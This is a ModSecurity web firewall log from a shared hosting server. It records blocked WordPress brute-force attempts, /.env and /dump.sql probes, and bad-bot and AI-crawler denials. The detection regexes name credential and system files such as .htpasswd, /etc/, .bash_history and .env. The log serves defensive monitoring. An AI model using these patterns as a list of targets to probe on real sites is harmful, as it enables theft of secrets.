[Tue May 26 13:29:02.515474 2026] [security2:error] [pid 512745:tid 512994] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSxnKSB_s2CvZg7xNokQAAAYE"]
[Tue May 26 13:29:02.595160 2026] [security2:error] [pid 512745:tid 512930] [client 62.244.225.226:4038] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVSxnKSB_s2CvZg7xNomQAAAUE"]
[Tue May 26 13:29:04.807108 2026] [security2:error] [pid 512745:tid 512917] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSyHKSB_s2CvZg7xNowgAAATQ"]
[Tue May 26 13:29:06.787930 2026] [security2:error] [pid 512745:tid 512956] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSynKSB_s2CvZg7xNo5wAAAVs"]
[Tue May 26 13:29:09.295322 2026] [security2:error] [pid 512745:tid 512951] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSzHKSB_s2CvZg7xNpCwAAAVY"]
[Tue May 26 13:29:11.549919 2026] [security2:error] [pid 512745:tid 512938] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSz3KSB_s2CvZg7xNpLgAAAUk"]
[Tue May 26 13:29:13.185477 2026] [security2:error] [pid 512344:tid 512559] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS0MbElyei4S77DQcAYgAAAFU"]
[Tue May 26 13:29:13.876236 2026] [security2:error] [pid 512745:tid 512902] [client 162.12.213.206:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS0XKSB_s2CvZg7xNpUAAAASU"]
[Tue May 26 13:29:15.821840 2026] [security2:error] [pid 512745:tid 512947] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS03KSB_s2CvZg7xNpigAAAVI"]
[Tue May 26 13:29:16.433582 2026] [security2:error] [pid 512745:tid 512932] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVS03KSB_s2CvZg7xNpZwABQxQ"]
[Tue May 26 13:29:17.655990 2026] [security2:error] [pid 512745:tid 512978] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS1XKSB_s2CvZg7xNpqgAAAXE"]
[Tue May 26 13:29:19.915308 2026] [security2:error] [pid 512344:tid 512544] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS18bElyei4S77DQcAqAAAAEY"]
[Tue May 26 13:29:21.834008 2026] [security2:error] [pid 512344:tid 512584] [client 195.178.110.48:55864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "mail.ktmadvance-senegal.com"] [uri "/"] [unique_id "ahVS2cbElyei4S77DQcA3QAAAG4"]
[Tue May 26 13:29:22.535531 2026] [security2:error] [pid 512344:tid 512587] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS2sbElyei4S77DQcA5AAAAHE"]
[Tue May 26 13:29:23.143899 2026] [security2:error] [pid 512745:tid 512894] [client 31.57.184.107:54584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "arunpandi.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVS23KSB_s2CvZg7xNp-QAAAR0"], referer: https://duckduckgo.com/
[Tue May 26 13:29:23.887196 2026] [security2:error] [pid 512745:tid 512899] [client 185.191.171.9:38682] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVS23KSB_s2CvZg7xNqBwAAASI"]
[Tue May 26 13:29:23.887304 2026] [security2:error] [pid 512745:tid 512899] [client 185.191.171.9:38682] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVS23KSB_s2CvZg7xNqBwAAASI"]
[Tue May 26 13:29:24.838599 2026] [security2:error] [pid 512745:tid 512939] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS3HKSB_s2CvZg7xNqEwAAAUo"]
[Tue May 26 13:29:25.587328 2026] [security2:error] [pid 512745:tid 512971] [client 107.189.14.4:18380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "srsglobalsoft.com"] [uri "/dump.sql"] [unique_id "ahVS3XKSB_s2CvZg7xNqIQAAAWo"], referer: srsglobalsoft.com/dump.sql
[Tue May 26 13:29:27.161120 2026] [security2:error] [pid 512344:tid 512537] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS3sbElyei4S77DQcBHQAAAD8"]
[Tue May 26 13:29:29.075506 2026] [security2:error] [pid 512745:tid 512842] [remote 94.76.235.103:32970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVS4HKSB_s2CvZg7xNqOgABdWA"]
[Tue May 26 13:29:29.430214 2026] [security2:error] [pid 512344:tid 512567] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS4cbElyei4S77DQcBOAAAAF0"]
[Tue May 26 13:29:29.846335 2026] [security2:error] [pid 512344:tid 512483] [client 77.68.9.24:50499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/images/images/cache.php"] [unique_id "ahVS4cbElyei4S77DQcBPgAAAAk"], referer: www.google.com
[Tue May 26 13:29:31.127419 2026] [security2:error] [pid 512745:tid 512913] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS4nKSB_s2CvZg7xNqUQAAATA"]
[Tue May 26 13:29:32.091156 2026] [security2:error] [pid 512745:tid 512898] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVS4nKSB_s2CvZg7xNqWAABIUk"]
[Tue May 26 13:29:32.295829 2026] [security2:error] [pid 512745:tid 512997] [client 95.70.131.179:64085] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVS5HKSB_s2CvZg7xNqawAAAYQ"]
[Tue May 26 13:29:33.879863 2026] [security2:error] [pid 512344:tid 512544] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS5cbElyei4S77DQcBaQAAAEY"]
[Tue May 26 13:29:34.262604 2026] [security2:error] [pid 512344:tid 512578] [client 133.125.102.51:52686] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVS5sbElyei4S77DQcBdQAAAGg"]
[Tue May 26 13:29:34.392215 2026] [autoindex:error] [pid 512745:tid 512979] [client 31.220.88.107:54465] AH01276: Cannot serve directory /home2/atreedfc/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 13:29:37.010641 2026] [security2:error] [pid 512745:tid 512992] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS6HKSB_s2CvZg7xNqqAAAAX8"]
[Tue May 26 13:29:37.307345 2026] [security2:error] [pid 512745:tid 512806] [remote 46.62.185.67:37982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVS6XKSB_s2CvZg7xNqsAABaDw"]
[Tue May 26 13:29:38.264430 2026] [security2:error] [pid 512745:tid 512914] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS6XKSB_s2CvZg7xNqugAAATE"]
[Tue May 26 13:29:40.323727 2026] [security2:error] [pid 512745:tid 512955] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS63KSB_s2CvZg7xNqzAAAAVo"]
[Tue May 26 13:29:40.562997 2026] [security2:error] [pid 512344:tid 512592] [client 77.68.9.24:60875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/images/images/cache.php"] [unique_id "ahVS7MbElyei4S77DQcBwwAAAHY"], referer: www.google.com
[Tue May 26 13:29:42.316299 2026] [security2:error] [pid 512745:tid 512908] [client 95.140.158.207:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVS7XKSB_s2CvZg7xNq2wABKxw"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 13:29:42.679506 2026] [security2:error] [pid 512745:tid 512992] [client 152.59.12.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS7nKSB_s2CvZg7xNq4AAAAX8"]
[Tue May 26 13:29:42.785840 2026] [security2:error] [pid 512745:tid 512962] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS7nKSB_s2CvZg7xNq5QAAAWE"]
[Tue May 26 13:29:44.997387 2026] [security2:error] [pid 512745:tid 512960] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS8HKSB_s2CvZg7xNrCQAAAV8"]
[Tue May 26 13:29:46.449807 2026] [security2:error] [pid 512745:tid 512997] [client 176.65.139.231:33404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/.env"] [unique_id "ahVS8nKSB_s2CvZg7xNrKgAAAYQ"]
[Tue May 26 13:29:46.820353 2026] [security2:error] [pid 512745:tid 512930] [client 85.208.96.203:17464] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/homepages/shop-classic/"] [unique_id "ahVS8nKSB_s2CvZg7xNrNQAAAUE"]
[Tue May 26 13:29:46.820462 2026] [security2:error] [pid 512745:tid 512930] [client 85.208.96.203:17464] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/homepages/shop-classic/"] [unique_id "ahVS8nKSB_s2CvZg7xNrNQAAAUE"]
[Tue May 26 13:29:46.944716 2026] [security2:error] [pid 512745:tid 512878] [client 176.65.139.235:60312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS8nKSB_s2CvZg7xNrOQAAAQ0"]
[Tue May 26 13:29:47.433358 2026] [security2:error] [pid 512745:tid 512906] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS83KSB_s2CvZg7xNrPAAAASk"]
[Tue May 26 13:29:47.433707 2026] [security2:error] [pid 512745:tid 512953] [client 176.65.139.237:39702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.himmatnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS83KSB_s2CvZg7xNrRgAAAVg"]
[Tue May 26 13:29:47.518694 2026] [security2:error] [pid 512344:tid 512521] [client 176.65.139.235:60328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.surat.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS88bElyei4S77DQcCBgAAAC8"]
[Tue May 26 13:29:47.797553 2026] [security2:error] [pid 512344:tid 512557] [client 176.65.139.231:56922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.omr.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS88bElyei4S77DQcCCwAAAFM"]
[Tue May 26 13:29:47.815291 2026] [security2:error] [pid 512745:tid 512989] [client 95.140.158.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/wp-admin/plugins.php"] [unique_id "ahVS83KSB_s2CvZg7xNrPQABfEU"], referer: https://kingsclub.in/wp-login.php?redirect_to=https%3A%2F%2Fkingsclub.in%2Fwp-admin%2F&reauth=1
[Tue May 26 13:29:49.471475 2026] [security2:error] [pid 512745:tid 512932] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVS9HKSB_s2CvZg7xNrVwABQ1Q"]
[Tue May 26 13:29:49.598759 2026] [security2:error] [pid 512745:tid 512972] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS9XKSB_s2CvZg7xNrYQAAAWs"]
[Tue May 26 13:29:49.629476 2026] [security2:error] [pid 512745:tid 512992] [client 176.65.139.234:23818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.soft.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS9XKSB_s2CvZg7xNrcAAAAX8"]
[Tue May 26 13:29:50.312029 2026] [security2:error] [pid 512745:tid 512882] [client 95.70.131.179:64041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVS9XKSB_s2CvZg7xNrcwAAARE"]
[Tue May 26 13:29:50.635183 2026] [security2:error] [pid 512344:tid 512422] [remote 46.101.54.125:53792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVS9sbElyei4S77DQcCJQAAbk0"]
[Tue May 26 13:29:50.926587 2026] [security2:error] [pid 512344:tid 512407] [remote 49.12.3.147:34556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVS9sbElyei4S77DQcCMgAAXz4"]
[Tue May 26 13:29:51.021825 2026] [security2:error] [pid 512344:tid 512494] [client 45.66.35.24:35344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.35.66.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahVS9sbElyei4S77DQcCMwAAABQ"]
[Tue May 26 13:29:51.555267 2026] [security2:error] [pid 512745:tid 512988] [client 45.66.35.24:34940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.35.66.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahVS93KSB_s2CvZg7xNreQAAAXs"]
[Tue May 26 13:29:51.681972 2026] [security2:error] [pid 512344:tid 512528] [client 16.148.188.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVS98bElyei4S77DQcCQwAAADY"]
[Tue May 26 13:29:51.790382 2026] [security2:error] [pid 512745:tid 512883] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS93KSB_s2CvZg7xNreAAAARI"]
[Tue May 26 13:29:51.851121 2026] [security2:error] [pid 512344:tid 512521] [client 16.148.188.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVS98bElyei4S77DQcCRwAAAC8"]
[Tue May 26 13:29:53.995305 2026] [security2:error] [pid 512745:tid 512998] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS-XKSB_s2CvZg7xNrlQAAAYU"]
[Tue May 26 13:29:54.318404 2026] [security2:error] [pid 512745:tid 512746] [remote 47.128.47.123:39848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/cicodev-afrique-appelle-letat-du-senegal-a-relativiser-la-promotion-de-la-privatisation-des-soins-de-sante/contact/"] [unique_id "ahVS-nKSB_s2CvZg7xNrqQABeAA"]
[Tue May 26 13:29:54.582888 2026] [security2:error] [pid 512745:tid 512882] [client 34.147.88.45:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "webdisk.consultrgb.com"] [uri "/"] [unique_id "ahVS-nKSB_s2CvZg7xNrsgAAARE"]
